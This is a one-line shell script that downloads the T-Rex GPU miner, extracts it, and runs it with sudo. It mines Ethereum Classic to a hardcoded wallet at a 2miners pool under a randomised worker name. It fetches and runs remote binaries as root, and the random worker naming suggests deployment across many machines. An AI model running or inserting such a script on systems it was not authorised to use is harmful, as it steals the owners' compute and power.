#!/bin/sh
apt-get install libpci3 && wget https://trex-miner.com/download/t-rex-0.19.14-linux-cuda11.1.tar.gz && tar -xvf t-rex-0.19.14-linux-cuda11.1.tar.gz && sudo ./t-rex -a etchash -o stratum+tcp://etc.2miners.com:1010 -u 0x63ff3693dc85176ff42d9e27a24b2e21907b4564 -w $(echo $(shuf -i 2-100 -n 1)-$(shuf -i 1-1000 -n 1)-T-Rex) -p x
